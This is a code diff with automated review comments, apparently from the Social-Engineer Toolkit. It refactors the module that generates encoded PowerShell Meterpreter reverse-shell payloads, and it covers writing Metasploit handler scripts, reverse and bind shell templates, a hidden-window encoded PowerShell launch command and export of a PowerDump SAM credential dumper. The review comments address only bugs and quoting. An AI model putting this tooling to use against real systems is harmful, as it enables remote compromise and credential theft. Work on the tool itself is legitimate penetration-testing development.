diff --git a/src/core/payloadgen/create_payloads.py b/src/core/payloadgen/create_payloads.py index 88b0b153f..854c00654 100644 --- a/src/core/payloadgen/create_payloads.py +++ b/src/core/payloadgen/create_payloads.py @@ -10,6 +10,7 @@ import base64 from src.core.setcore import * from src.core.menu.text import * from src.core.dictionaries import * +from src.payloads.powershell.prep import prep_powershell_payload try: if len(check_options("IPADDR=")) > 2: @@ -599,10 +600,7 @@ try: if setshell_counter == 0: if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum": if os.path.isfile("%s/web_clone/index.html" % (setdir)): - try: - reload(src.payloads.powershell.prep) - except: - import src.payloads.powershell.prep + prep_powershell_payload() if os.path.isfile("%s/x86.powershell" % (setdir)): fileopen1 = open( "%s/x86.powershell" % (setdir), "r") diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py index 0b06edab4..66957f4bb 100644 --- a/src/fasttrack/mssql.py +++ b/src/fasttrack/mssql.py @@ -8,6 +8,7 @@ import subprocess import time import src.core.setcore as core import impacket.tds as tds +from src.payloads.powershell.prep import prep_powershell_payload #from src.core.payloadgen import create_payloads 
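Review bot: `prep_powershell_payload()` is now called unconditionally once `web_clone/index.html` exists, but the very next context line decides what to serve by `os.path.isfile("%s/x86.powershell" % (setdir))`; since prep writes that file only as its final step (see the end of the prep.py hunk), a failure part-way through payload generation leaves a stale `x86.powershell` from an earlier run in place and it would be served with the previous target's IP and port. Removing the stale file before the call makes the check meaningful: `stale = "%s/x86.powershell" % (setdir)` / `if os.path.isfile(stale): os.remove(stale)`. Whether such a failure even reaches this point depends on the handler of the enclosing `try:` (named in the hunk header), which lies outside the hunk; if it is a catch-all, the error would be masked much as the removed bare `except:` did.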
@@ -172,28 +173,25 @@ def deploy_hex2binary(ipaddr, port, username, password): if choice1 == "1": web_path = None - try: - core.module_reload(create_payloads) - except: - import src.core.payloadgen.create_payloads + prep_powershell_payload() - # if we are using a SET interactive shell payload then we need to make - # the path under web_clone versus ~./set - if os.path.isfile(os.path.join(core.setdir + "set.payload")): - web_path = os.path.join(core.setdir + "web_clone") - # then we are using metasploit - else: - if operating_system == "posix": - web_path = core.setdir - # if it isn't there yet - if not os.path.isfile(core.setdir + "1msf.exe"): - # move it then - subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % - (core.setdir, core.setdir), shell=True).wait() - subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % - (core.setdir, core.setdir), shell=True).wait() - subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % - (core.setdir, core.setdir), shell=True).wait() + # if we are using a SET interactive shell payload then we need to make + # the path under web_clone versus ~./set + if os.path.isfile(os.path.join(core.setdir + "set.payload")): + web_path = os.path.join(core.setdir + "web_clone") + # then we are using metasploit + else: + if operating_system == "posix": + web_path = core.setdir + # if it isn't there yet + if not os.path.isfile(core.setdir + "1msf.exe"): + # move it then + subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % + (core.setdir, core.setdir), shell=True).wait() + subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % + (core.setdir, core.setdir), shell=True).wait() + subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % + (core.setdir, core.setdir), shell=True).wait() payload_filename = os.path.join(web_path + "1msf.exe") with open(payload_filename, "rb") as fileopen: diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py index 4b2271c3d..c2bcdf761 100644 
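Review bot: The three `cp` commands that move to the new indentation still run through `shell=True` with `core.setdir` interpolated unquoted, so a setdir containing a space or a shell metacharacter breaks or alters the command; `shutil.copyfile` (shutil would need to be imported in this file) performs the same copies with no shell involved. Note that the middle command, `cp %s/1msf.exe %s/` with both placeholders filled from `core.setdir`, copies the file onto its own directory, which cp refuses as the same file — its only effect is the stderr redirect hiding that error. Also, when `operating_system` is not "posix" and `set.payload` is absent, `web_path` stays None and the context line `payload_filename = os.path.join(web_path + "1msf.exe")` raises TypeError; presumably unreachable in practice, but an explicit guard would make that intent clear. `deploy_hex2binary` starts before and continues after this hunk.
```python
            # … unchanged: web_path selection when set.payload exists …
            if operating_system == "posix":
                web_path = core.setdir
                # if it isn't there yet
                if not os.path.isfile(os.path.join(core.setdir, "1msf.exe")):
                    # copy without a shell so setdir needs no quoting
                    shutil.copyfile(os.path.join(core.setdir, "msf.exe"),
                                    os.path.join(core.setdir, "1msf.exe"))
                    # the old copy of 1msf.exe into its own directory was a no-op and is dropped
                    if os.path.isfile(os.path.join(core.setdir, "msf2.exe")):
                        shutil.copyfile(os.path.join(core.setdir, "msf2.exe"),
                                        os.path.join(core.setdir, "msf.exe"))
```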
--- a/src/fasttrack/psexec.py +++ b/src/fasttrack/psexec.py @@ -8,6 +8,7 @@ import os import subprocess import src.core.setcore as core +from src.payloads.powershell.prep import prep_powershell_payload # Py2/3 compatibility # Python3 renamed raw_input to input @@ -74,10 +75,7 @@ try: core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") - try: - core.module_reload(src.payloads.powershell.prep) - except: - import src.payloads.powershell.prep + prep_powershell_payload() # create the directory if it does not exist if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): diff --git a/src/payloads/powershell/prep.py b/src/payloads/powershell/prep.py index 1a3483680..747e407a0 100644 --- a/src/payloads/powershell/prep.py +++ b/src/payloads/powershell/prep.py 
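Review bot: The context line right after the new call, `if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):`, hands a single concatenated string to os.path.join, so no separator is inserted and the path is only correct if `core.setdir` already ends in a slash (not visible here); otherwise the mkdir a few lines later would create `<parent>/.setreports/powershell`. The other files in this commit build paths with the two-argument form `os.path.join(core.setdir, ...)`, so `if not os.path.isdir(os.path.join(core.setdir, "reports", "powershell")):` would be both safer and consistent. The `try:` block enclosing this hunk starts before it and its handler is outside the hunk, so any exception now raised by `prep_powershell_payload()` (the old bare `except:` fallback is gone) lands there — worth checking that handler does not silently swallow it.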
@@ -1,203 +1,199 @@ #!/usr/bin/env python -import sys -import subprocess -import re +# coding=utf-8 import os +import re import time -from src.core.setcore import * -# grab stage encoding flag -stage_encoding = check_config("STAGE_ENCODING=").lower() -if stage_encoding == "off": - stage_encoding = "false" -else: - stage_encoding = "true" +import src.core.setcore as core -# check to see if we are just generating powershell code -powershell_solo = check_options("POWERSHELL_SOLO") +# Py2/3 compatibility +# Python3 renamed raw_input to input +try: + input = raw_input +except NameError: + pass -# check if port is there -port = check_options("PORT=") +def prep_powershell_payload(): -# check if we are using auto_migrate -auto_migrate = check_config("AUTO_MIGRATE=") - -# check if we are using pyinjection -pyinjection = check_options("PYINJECTION=") -if pyinjection == "ON": - # check to ensure that the payload options were specified right - if os.path.isfile(setdir + "/payload_options.shellcode"): - pyinjection = "on" - print_status( - "Multi/Pyinjection was specified. 
Overriding config options.") + # grab stage encoding flag + stage_encoding = core.check_config("STAGE_ENCODING=").lower() + if stage_encoding == "off": + stage_encoding = "false" else: - pyinjection = "off" + stage_encoding = "true" -# grab ipaddress -if check_options("IPADDR=") != 0: - ipaddr = check_options("IPADDR=") -else: - ipaddr = input("Enter the ipaddress for the reverse connection: ") - update_options("IPADDR=" + ipaddr) + # check to see if we are just generating powershell code + powershell_solo = core.check_options("POWERSHELL_SOLO") -# check to see if we are using multi powershell injection -multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower() + # check if port is there + port = core.check_options("PORT=") -# turn off multi injection if pyinjection is specified -if pyinjection == "on": - multi_injection = "off" + # check if we are using auto_migrate + auto_migrate = core.check_config("AUTO_MIGRATE=") -# check what payloads we are using -powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=") + # check if we are using pyinjection + pyinjection = core.check_options("PYINJECTION=") + if pyinjection == "ON": + # check to ensure that the payload options were specified right + if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")): + pyinjection = "on" + core.print_status("Multi/Pyinjection was specified. 
Overriding config options.") + else: + pyinjection = "off" -# if we specified a hostname then default to reverse https/http -if validate_ip(ipaddr) == False: - powershell_inject_x86 = "windows/meterpreter/reverse_http" + # grab ipaddress + if core.check_options("IPADDR=") != 0: + ipaddr = core.check_options("IPADDR=") + else: + ipaddr = input("Enter the ipaddress for the reverse connection: ") + core.update_options("IPADDR=" + ipaddr) -# prompt what port to listen on for powershell then make an append to the current -# metasploit answer file -if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): - # if we have multi injection on, don't worry about these - if multi_injection != "on": - if pyinjection == "off": - print_status( - "POWERSHELL_INJECTION is set to ON with multi-pyinjector") - port = input(setprompt( - ["4"], "Enter the port for Metasploit to listen on for powershell [443]")) - if port == "": + # check to see if we are using multi powershell injection + multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower() + + # turn off multi injection if pyinjection is specified + if pyinjection == "on": + multi_injection = "off" + + # check what payloads we are using + powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=") + + # if we specified a hostname then default to reverse https/http + if not core.validate_ip(ipaddr): + powershell_inject_x86 = "windows/meterpreter/reverse_http" + + # prompt what port to listen on for powershell then make an append to the current + # metasploit answer file + if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): + # if we have multi injection on, don't worry about these + if multi_injection != "on" and pyinjection == "off": + core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector") + port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) + if not port: port = "443" - fileopen = 
open("%s/meta_config_multipyinjector" % (setdir), "r") - data = fileopen.read() + with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen: + data = fileopen.read() match = re.search(port, data) if not match: - filewrite = open( - "%s/meta_config_multipyinjector" % (setdir), "a") - filewrite.write("\nuse exploit/multi/handler\n") - if auto_migrate == "ON": - filewrite.write( - "set AutoRunScript post/windows/manage/smart_migrate\n") - filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" % - (powershell_inject_x86, ipaddr, port, stage_encoding)) - filewrite.close() + with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: + filewrite.write("\nuse exploit/multi/handler\n") + if auto_migrate == "ON": + filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") + filewrite.write("set PAYLOAD {0}\n" + "set LHOST {1}\n" + "set LPORT {2}\n" + "set EnableStageEncoding {3}\n" + "set ExitOnSession false\n" + "exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding)) -# if we have multi injection on, don't worry about these -if multi_injection != "on": - if pyinjection == "off": + # if we have multi injection on, don't worry about these + if multi_injection != "on" and pyinjection == "off": # check to see if the meta config multi pyinjector is there - if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): - if check_options("PORT=") != 0: - port = check_options("PORT=") + if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): + if core.check_options("PORT=") != 0: + port = core.check_options("PORT=") # if port.options isnt there then prompt else: - port = input(setprompt( - ["4"], "Enter the port for Metasploit to listen on for powershell [443]")) - if port == "": + port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) + if not 
port: port = "443" - update_options("PORT=" + port) + core.update_options("PORT={0}".format(port)) -# turn off multi_injection if we are riding solo from the powershell menu -if powershell_solo == "ON": - multi_injection = "off" - pyinjection = "on" + # turn off multi_injection if we are riding solo from the powershell menu + if powershell_solo == "ON": + multi_injection = "off" + pyinjection = "on" -# if we are using multi powershell injection -if multi_injection == "on": - if pyinjection == "off": - print_status( - "Multi-Powershell-Injection is set to ON, this should be sweet...") + # if we are using multi powershell injection + if multi_injection == "on" and pyinjection == "off": + core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...") -# define a base variable -x86 = "" + # define a base variable + x86 = "" -# specify a list we will use for later -multi_injection_x86 = "" - -# here we do some funky loops so we don't need to rewrite the code below -if multi_injection == "on": - port = check_config("POWERSHELL_MULTI_PORTS=") - port = port.split(",") - -if multi_injection == "on": - # iterate through the ports, used for POWERSHELL_MULTI_PORTS - for ports in port: - # dont cycle through if theres a blank - if ports != "": - print_status( - "Generating x86-based powershell injection code for port: %s" % (ports)) - multi_injection_x86 = multi_injection_x86 + "," + \ - generate_powershell_alphanumeric_payload( - powershell_inject_x86, ipaddr, ports, x86) - - if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): - port_check = check_ports( - "%s/meta_config_multipyinjector" % (setdir), ports) - if port_check == False: - filewrite = open( - "%s/meta_config_multipyinjector" % (setdir), "a") - filewrite.write("\nuse exploit/multi/handler\n") - if auto_migrate == "ON": - filewrite.write( - "set AutoRunScript post/windows/manage/smart_migrate\n") - filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT 
%s\nset ExitOnSession false\nexploit -j\n\n" % ( - powershell_inject_x86, ipaddr, stage_encoding, ports)) - filewrite.close() - - # if we aren't using multi pyinjector - if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): - # if meta config isn't created yet then create it - if not os.path.isfile("%s/meta_config" % (setdir)): - filewrite = open("%s/meta_config" % (setdir), "w") - filewrite.write("") - filewrite.close() - port_check = check_ports("%s/meta_config" % (setdir), ports) - if port_check == False: - filewrite = open("%s/meta_config" % (setdir), "a") - filewrite.write("\nuse exploit/multi/handler\n") - if auto_migrate == "ON": - filewrite.write( - "set AutoRunScript post/windows/manage/smart_migrate\n") - filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % ( - powershell_inject_x86, ipaddr, stage_encoding, ports)) - filewrite.close() - -# here we do everything if pyinjection or multi pyinjection was specified -if pyinjection == "on": + # specify a list we will use for later multi_injection_x86 = "" - # read in the file we need for parsing - fileopen = open(setdir + "/payload_options.shellcode", "r") - payloads = fileopen.read()[:-1].rstrip() # strips an extra , - payloads = payloads.split(",") - # format: payloadport - for payload in payloads: + + # here we do some funky loops so we don't need to rewrite the code below + if multi_injection == "on": + port = core.check_config("POWERSHELL_MULTI_PORTS=") + port = port.split(",") + + if multi_injection == "on": + # iterate through the ports, used for POWERSHELL_MULTI_PORTS + for ports in port: + # dont cycle through if theres a blank + if ports: + core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports)) + multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86) + + if 
os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): + port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports) + if not port_check: + with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: + filewrite.write("\nuse exploit/multi/handler\n") + if auto_migrate == "ON": + filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") + filewrite.write("set PAYLOAD {0}\n" + "set LHOST {1}\n" + "set EnableStageEncoding {2}\n" + "set LPORT {3}\n" + "set ExitOnSession false\n" + "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) + + # if we aren't using multi pyinjector + if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): + # if meta config isn't created yet then create it + if not os.path.isfile(): + with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite: + filewrite.write("") + port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports) + if not port_check: + with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite: + filewrite.write("\nuse exploit/multi/handler\n") + if auto_migrate == "ON": + filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") + filewrite.write("set PAYLOAD {0}\n" + "set LHOST {1}\n" + "set EnableStageEncoding {2}\n" + "set ExitOnSession false\n" + "set LPORT {3}\n" + "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) + + # here we do everything if pyinjection or multi pyinjection was specified + if pyinjection == "on": + injections = [] + # read in the file we need for parsing + with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen: + payloads = fileopen.read()[:-1].rstrip() # strips an extra , + payloads = payloads.split(",") # format: payloadport - payload = payload.split(" ") - powershell_inject_x86 = payload[0] - port = payload[1] - print_status("Generating x86-based 
powershell injection code...") - multi_injection_x86 = multi_injection_x86 + "," + \ - generate_powershell_alphanumeric_payload( - powershell_inject_x86, ipaddr, port, x86) + for payload in payloads: + # format: payloadport + payload = payload.split(" ") + powershell_inject_x86 = payload[0] + port = payload[1] + core.print_status("Generating x86-based powershell injection code...") + injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)) + multi_injection_x86 = ",".join(injections) -# if its turned to off -if multi_injection == "off": - if pyinjection == "off": - print_status("Generating x86-based powershell injection code...") - x86 = generate_powershell_alphanumeric_payload( - powershell_inject_x86, ipaddr, port, x86) + # if its turned to off + if multi_injection == "off" and pyinjection == "off": + core.print_status("Generating x86-based powershell injection code...") + x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86) -# if we are specifying multi powershell injection -if multi_injection == "on" or pyinjection == "on": - x86 = multi_injection_x86[1:] # remove comma at beginning + # if we are specifying multi powershell injection + if multi_injection == "on" or pyinjection == "on": + x86 = multi_injection_x86[1:] # remove comma at beginning -# check to see if we want to display the powershell command to the user -verbose = check_config("POWERSHELL_VERBOSE=") -if verbose.lower() == "on": - print_status("Printing the x86 based encoded code...") - time.sleep(3) - print(x86) + # check to see if we want to display the powershell command to the user + verbose = core.check_config("POWERSHELL_VERBOSE=") + if verbose.lower() == "on": + core.print_status("Printing the x86 based encoded code...") + time.sleep(3) + print(x86) -filewrite = open("%s/x86.powershell" % (setdir), "w") -filewrite.write(x86) -filewrite.close() -print_status("Finished generating powershell injection 
bypass.") -print_status("Encoded to bypass execution restriction policy...") + with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite: + filewrite.write(x86) + core.print_status("Finished generating powershell injection bypass.") + core.print_status("Encoded to bypass execution restriction policy...") diff --git a/src/powershell/__init__.py b/src/powershell/__init__.py index e69de29bb..9bad5790a 100644 --- a/src/powershell/__init__.py +++ b/src/powershell/__init__.py @@ -0,0 +1 @@ +# coding=utf-8 diff --git a/src/powershell/powershell.py b/src/powershell/powershell.py index 749c90a73..058b3fb95 100644 --- a/src/powershell/powershell.py +++ b/src/powershell/powershell.py 
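Review bot: The new meta_config branch calls `os.path.isfile()` with no argument, so the first multi-injection port on a fresh run raises TypeError before meta_config is ever created; it should read `if not os.path.isfile(os.path.join(core.setdir, "meta_config")):`. Second, the pyinjection path now builds `multi_injection_x86 = ",".join(injections)` without the leading comma that the multi-port loop still prepends, yet the later `x86 = multi_injection_x86[1:]  # remove comma at beginning` still strips one character, so for POWERSHELL_SOLO / pyinjection runs the first character of the encoded payload is dropped; `x86 = multi_injection_x86.lstrip(",")` handles both shapes. The unchanged `match = re.search(port, data)` treats the port as an unanchored pattern, so port 44 would be reported as already configured when only 443 is present — the multi-port loop below uses `core.check_ports(...)` for the same question, and using it here too would be consistent. `prep_powershell_payload` begins and ends inside this hunk.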
@@ -1,145 +1,139 @@ #!/usr/bin/python +# coding=utf-8 # # # handle powershell payloads and get them ready # # # -from src.core.setcore import * +import os +import shutil +import subprocess + +import src.core.setcore as core from src.core.menu import text +from src.payloads.powershell.prep import prep_powershell_payload -me = mod_name() +# Py2/3 compatibility +# Python3 renamed raw_input to input +try: + input = raw_input +except NameError: + pass -debug_msg(me, "printing 'text.powershell menu'", 5) -show_powershell_menu = create_menu(text.powershell_text, text.powershell_menu) -powershell_menu_choice = input(setprompt(["29"], "")) +core.debug_msg(core.mod_name(), "printing 'text.powershell menu'", 5) + +show_powershell_menu = core.create_menu(text.powershell_text, text.powershell_menu) +powershell_menu_choice = input(core.setprompt(["29"], "")) if powershell_menu_choice != "99": # specify ipaddress of reverse listener - ipaddr = grab_ipaddress() - update_options("IPADDR=" + ipaddr) + ipaddr = core.grab_ipaddress() + core.update_options("IPADDR=" + ipaddr) # if we select alphanumeric shellcode if powershell_menu_choice == "1": - port = input( - setprompt(["29"], "Enter the port for the reverse [443]")) - if port == "": + port = input(core.setprompt(["29"], "Enter the port for the reverse [443]")) + if not port: port = "443" - update_options("PORT=" + port) - update_options("POWERSHELL_SOLO=ON") - print_status( - "Prepping the payload for delivery and injecting alphanumeric shellcode...") + core.update_options("PORT=" + port) + core.update_options("POWERSHELL_SOLO=ON") + core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") - filewrite = open(setdir + "/payload_options.shellcode", "w") - filewrite.write("windows/meterpreter/reverse_tcp " + port + ",") - filewrite.close() + with open(core.setdir + "/payload_options.shellcode", "w") as filewrite: + filewrite.write("windows/meterpreter/reverse_tcp {},".format(port)) - try: - 
module_reload(src.payloads.powershell.prep) - except: - import src.payloads.powershell.prep + prep_powershell_payload() # create the directory if it does not exist - if not os.path.isdir(setdir + "/reports/powershell"): - os.makedirs(setdir + "/reports/powershell") + if not os.path.isdir(core.setdir + "/reports/powershell"): + os.makedirs(core.setdir + "/reports/powershell") # here we format everything for us - x86 = open(setdir + "/x86.powershell", "r") - x86 = x86.read() + with open(core.setdir + "/x86.powershell") as fileopen: + x86 = fileopen.read() x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86 - print_status( - "If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) - filewrite = open( - setdir + "/reports/powershell/x86_powershell_injection.txt", "w") - filewrite.write(x86) - filewrite.close() + core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/"))) + with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite: + filewrite.write(x86) - choice = yesno_prompt( - "0", "Do you want to start the listener now [yes/no]: ") + choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ") if choice == 'NO': pass # if we want to start the listener if choice == 'YES': - filewrite = open(setdir + "/reports/powershell/powershell.rc", "w") - filewrite.write( - "use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port)) - filewrite.close() - msf_path = meta_path() - subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" % - (msf_path, setdir), shell=True).wait() + with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite: + filewrite.write("use multi/handler\n" + "set payload windows/meterpreter/reverse_tcp\n" + "set LPORT {0}\n" + 
"set LHOST 0.0.0.0\n" + "set ExitOnSession false\n" + "exploit -j".format(port)) - print_status( - "Powershell files can be found under %s/reports/powershell/" % (setdir)) - return_continue() + msf_path = core.meta_path() + subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), + os.path.join(core.setdir, "reports/powershell/powershell.rc")), + shell=True).wait() + + core.print_status("Powershell files can be found under {0}".format(os.path.join(core.setdir, "reports/powershell"))) + core.return_continue() # if we select powershell reverse shell if powershell_menu_choice == "2": # prompt for IP address and port - port = input( - setprompt(["29"], "Enter the port for listener [443]")) + port = input(core.setprompt(["29"], "Enter the port for listener [443]")) # default to 443 - if port == "": + if not port: port = "443" # open the reverse shell up - print_status("Rewriting the powershell reverse shell with options") - fileopen = open("src/powershell/reverse.powershell", "r") - data = fileopen.read() + core.print_status("Rewriting the powershell reverse shell with options") + with open("src/powershell/reverse.powershell") as fileopen: + data = fileopen.read() data = data.replace("IPADDRHERE", ipaddr) data = data.replace("PORTHERE", port) - print_status( - "Exporting the powershell stuff to %s/reports/powershell" % (setdir)) + core.print_status("Exporting the powershell stuff to {0}".format(os.path.join(core.setdir, "reports/powershell"))) # create the directory if it does not exist - if not os.path.isdir(setdir + "/reports/powershell"): - os.makedirs(setdir + "/reports/powershell") - filewrite = open( - setdir + "/reports/powershell/powershell.reverse.txt", "w") - filewrite.write(data) - filewrite.close() + if not os.path.isdir(core.setdir + "/reports/powershell"): + os.makedirs(core.setdir + "/reports/powershell") + with open(core.setdir + "/reports/powershell/powershell.reverse.txt", "w") as filewrite: + filewrite.write(data) - choice = 
yesno_prompt("0", "Do you want to start a listener [yes/no]") + choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]") if choice == "NO": - print_status( - "Have netcat or standard socket listener on port %s" % (port)) + core.print_status("Have netcat or standard socket listener on port {0}".format(port)) if choice == "YES": - socket_listener(port) + core.socket_listener(port) - return_continue() + core.return_continue() # if we select powershell bind shell if powershell_menu_choice == "3": - port = input( - setprompt(["29"], "Enter the port for listener [443]")) + port = input(core.setprompt(["29"], "Enter the port for listener [443]")) # open file - fileopen = open("src/powershell/bind.powershell", "r") - data = fileopen.read() + with open("src/powershell/bind.powershell") as fileopen: + data = fileopen.read() data = data.replace("PORTHERE", port) # create the directory if it does not exist - if not os.path.isdir(setdir + "/reports/powershell"): - os.makedirs(setdir + "/reports/powershell") - filewrite = open( - setdir + "/reports/powershell/powershell.bind.txt", "w") - filewrite.write(data) - filewrite.close() - print_status( - "The powershell program has been exported to %s/reports/powershell/" % (setdir)) - return_continue() + if not os.path.isdir(core.setdir + "/reports/powershell"): + os.makedirs(core.setdir + "/reports/powershell") + with open(core.setdir + "/reports/powershell/powershell.bind.txt", "w") as filewrite: + filewrite.write(data) + core.print_status("The powershell program has been exported to {0}".format(os.path.join(core.setdir, "reports/powershell/"))) + core.return_continue() # if we select powershell powerdump SAM dump if powershell_menu_choice == "4": # create the directory if it does not exist - if not os.path.isdir(setdir + "/reports/powershell"): - os.makedirs(setdir + "/reports/powershell") + if not os.path.isdir(core.setdir + "/reports/powershell"): + os.makedirs(core.setdir + "/reports/powershell") # copy file if 
os.path.isfile("src/powershell/powerdump.encoded"): - shutil.copyfile("src/powershell/powerdump.encoded", - setdir + "/reports/powershell/powerdump.encoded.txt") - print_status( - "The powershell program has been exported to %s/reports/powershell/" % (setdir)) - print_status( - "Note with PowerDump -- You MUST be running as SYSTEM when executing.") - return_continue() + shutil.copyfile("src/powershell/powerdump.encoded", core.setdir + "/reports/powershell/powerdump.encoded.txt") + core.print_status("The powershell program has been exported to {}".format(os.path.join(core.setdir, "reports/powershell"))) + core.print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.") + core.return_continue()
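Review bot: In the bind-shell branch (`powershell_menu_choice == "3"`) the prompt advertises a default of 443 but, unlike branches 1 and 2, an empty answer is not defaulted, so `data.replace("PORTHERE", port)` writes a bind script with no port at all; add `if not port: port = "443"` directly after that `input(...)` line. The listener launch `subprocess.Popen("{0} -r {1}".format(...), shell=True).wait()` still assembles a shell command from two file paths; `subprocess.call([os.path.join(msf_path, "msfconsole"), "-r", os.path.join(core.setdir, "reports/powershell/powershell.rc")])` runs it without a shell and needs no quoting should either path contain spaces or metacharacters. The port values written into powershell.rc and substituted into the reverse/bind templates are operator input that is never checked to be numeric; a `port.isdigit()` check before `core.update_options("PORT=" + port)` would catch typos before a handler is started on the wrong port.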